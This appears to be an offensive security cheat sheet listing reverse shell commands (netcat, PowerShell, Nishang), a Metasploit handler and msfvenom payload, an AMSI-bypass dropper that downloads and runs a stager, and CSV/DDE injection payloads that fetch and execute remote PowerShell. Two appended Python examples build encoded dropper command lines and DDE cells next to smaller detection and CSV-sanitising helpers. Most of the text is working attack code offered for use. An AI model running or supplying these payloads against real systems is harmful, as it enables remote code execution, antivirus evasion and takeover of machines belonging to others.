
Reverse Shell

Netcat

nc.exe <ip> <port> -e cmd.exe

Unicorn

python unicorn.py windows/meterpreter/reverse_https <ip> <port>

MSF

exploit/windows/smb/smb_delivery

PowerShell

64-bit process (from a 32-bit process on 64-bit Windows, the Sysnative path reaches the 64-bit PowerShell):

c:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell "IEX(New-Object Net.WebClient).downloadstring('http://<ip>/<shell.ps1>')"

Nishang reverse TCP shell, usable as <shell.ps1> above (Kali path; the script only defines the function, so append a call such as Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> at the end of the file):
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1

Inline TCP reverse shell (nothing written to disk):
$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Bypass Windows Defender

info

The technique below bypasses AMSI (the dropper replaces the PowerShell session's amsiContext with a junk buffer, so scan calls fail and the content is not blocked) and fetches the stager through the system proxy with the current user's default credentials.

Last tested: 28/06/2018.

Handler RC file

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set LURI /api/callback
set ExitOnSession false
# start the handler as a background job so the console stays usable
exploit -j -z

Payload

msfvenom -p windows/x64/meterpreter/reverse_https lhost=<ip/domain> lport=443 luri=/api/callback -e x64/xor -f psh-net -o payload.pshnet
# serve payload.pshnet from the current directory (Python 2: python -m SimpleHTTPServer 80)
python3 -m http.server 80

Dropper build

tip

Encode the dropper with CyberChef: Encode text (UTF-16LE, code page 1200), then To Base64. This is the encoding powershell.exe expects for -EncodedCommand.

$mem=[System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').SetValue($null, $null);[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null, [IntPtr]$mem);[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$e=new-object net.webclient;$e.proxy=[Net.WebRequest]::GetSystemWebProxy();$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $e.downloadstring('http://<ip/domain>/payload.pshnet')

Encode the dropper with PowerShell (same result as the CyberChef recipe)

# Base64 encoding (UTF-16LE, as expected by powershell -EncodedCommand):
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\<..>\amsi-bypass.ps1")))
# Base64 is pure ASCII; force ASCII output so no BOM/UTF-16 file bytes get pasted along with it
Write-Output $Base64 | Out-File -Encoding ASCII "payload-b64"

# Base64 decoding (to verify the round trip; the output file is UTF-16LE text):
$bytes = [Convert]::FromBase64String($Base64)
[IO.File]::WriteAllBytes("C:\Users\<..>\payload-b64-decoded", $bytes)

Final dropper

powershell.exe -NoP -NonI -W Hidden -e <base64_cyberchef>
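Added example (not part of the original page): the UTF-16LE + Base64 step behind the CyberChef recipe, the PowerShell encoder above and the CSV "Short payload" below, done on the attacker box in Python, plus the triage-side inverse (pull the -e argument out of a captured command line, decode it, and flag the strings this dropper contains). The DROPPER string and the INDICATORS list are constructed stand-ins, not the page's one-liner.

```python
import base64
import re
from typing import List, Optional

# Constructed stand-in for the page's AMSI-bypass dropper: a short script with the
# same shape (IEX of a downloaded stager) is used so the example stays readable.
DROPPER = "IEX (New-Object Net.WebClient).DownloadString('http://<ip/domain>/payload.pshnet')"

# Assumed indicator list for triage, taken from strings present in this page's dropper.
INDICATORS = (
    "AmsiUtils", "amsiContext", "amsiSession", "ServerCertificateValidationCallback",
    "DownloadString", "IEX", "Net.WebClient",
)


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand argument: UTF-16LE bytes, then Base64.
    Equivalent to CyberChef 'Encode text (UTF-16LE, 1200)' followed by 'To Base64'."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Inverse of encode_command: what powershell.exe does with the -e argument."""
    return base64.b64decode(b64).decode("utf-16-le")


def build_dropper_cmdline(script: str) -> str:
    """The 'Final dropper' command line from the page with the encoded script filled in."""
    return "powershell.exe -NoP -NonI -W Hidden -e " + encode_command(script)


def probably_utf16le(raw: bytes) -> bool:
    """Heuristic: an ASCII script encoded as UTF-16LE has a zero high byte per character.
    Catches the common mistake of Base64-encoding the script as UTF-8 (PowerShell would
    then decode the bytes as UTF-16LE and run garbage)."""
    if len(raw) < 2 or len(raw) % 2:
        return False
    high_bytes = raw[1::2]
    return high_bytes.count(0) >= 0.9 * len(high_bytes)


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Triage helper: find the -e/-enc/-EncodedCommand argument in a captured
    powershell.exe command line and decode it. Returns None when there is none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
        if name and "encodedcommand".startswith(name):
            return decode_command(tokens[i + 1])
    return None


def find_indicators(script: str) -> List[str]:
    """Case-insensitive search for the indicator strings; returns those present."""
    return [s for s in INDICATORS if re.search(re.escape(s), script, re.IGNORECASE)]


if __name__ == "__main__":
    cmd = build_dropper_cmdline(DROPPER)
    print(cmd)
    decoded = extract_encoded_command(cmd)
    print("decoded:", decoded)
    print("indicators:", find_indicators(decoded or ""))
```

The encoder is the attacker-side step; extract_encoded_command and find_indicators are what a detection engineer runs over process-creation logs, and probably_utf16le is the check that tells a wrongly encoded (UTF-8) payload from a correct one before it is ever sent.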

CSV injection

PoC

=cmd|' /c calc'!A1
=cmd|'/c REM.&&@p^o^w^e^r^s^h^e^l^l c:/*/*2/?al?.?x?"'!_xlbgnm.A1
info

For PowerShell, the Base64 conversion must use UTF-16LE (Unicode) encoding, as in the short payload below.

Short payload

$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\rsh.ps1")))
Write-Output $Base64 | Out-File -FilePath "C:\Users\rsh.b64"

# Content of file f (served at http://192.168.1.1/f):
powershell -e <contents of C:\Users\rsh.b64>

powershell "wget 192.168.1.1/f|iex"

DownloadString

tip

The command in the PowerShell IEX payload sits inside the single quotes of =cmd|'...'!, so every single quote inside it must be doubled ('') even when the payload is Base64-encoded.

=cmd|'/c powershell.exe -command iex (new-object Net.WebClient).DownloadString(''http://<ip/domain>/f.ps1'')'!_A1
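Added example (not part of the original page): a small Python helper that builds the =cmd|'...'!<ref> cells used in the PoCs above with the single-quote doubling rule applied, beside the defensive check an application exporting CSV should run on every field. The sample rows are constructed; neutralize_cell follows the usual advice of prefixing a single quote so the spreadsheet treats the field as text.

```python
import csv
import io

# Leading characters a spreadsheet interprets as a formula (=, +, -, @) or that can
# break out of a cell (tab, carriage return).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def dde_cell(command: str, cell_ref: str = "A1") -> str:
    """Offensive side: build the DDE form used in this page's PoCs, =cmd|'<command>'!<ref>.
    The command is wrapped in single quotes, so each single quote inside it is doubled."""
    return "=cmd|'" + command.replace("'", "''") + "'!" + cell_ref


def is_formula_injection(value: str) -> bool:
    """Does this field start with a character a spreadsheet would evaluate?"""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Defensive side: prefix a single quote so the field is shown as text. The CSV
    writer below then quotes the field and doubles embedded double quotes (RFC 4180)."""
    return "'" + value if is_formula_injection(value) else value


def write_safe_csv(rows) -> str:
    """Serialize rows with every field quoted and formula-like fields neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample export with an attacker-controlled "comment" field.
    stager = "/c powershell.exe -command iex (new-object Net.WebClient).DownloadString('http://<ip/domain>/f.ps1')"
    rows = [
        ["user", "comment"],
        ["alice", "fine"],
        ["mallory", dde_cell(" /c calc")],
        ["mallory", dde_cell(stager, "_A1")],
    ]
    print(write_safe_csv(rows))
```

Note the side effect of the defensive prefix: legitimate values such as negative numbers (-5) or handles (@user) also get the leading quote, which is the accepted trade-off for exports that are opened in a spreadsheet.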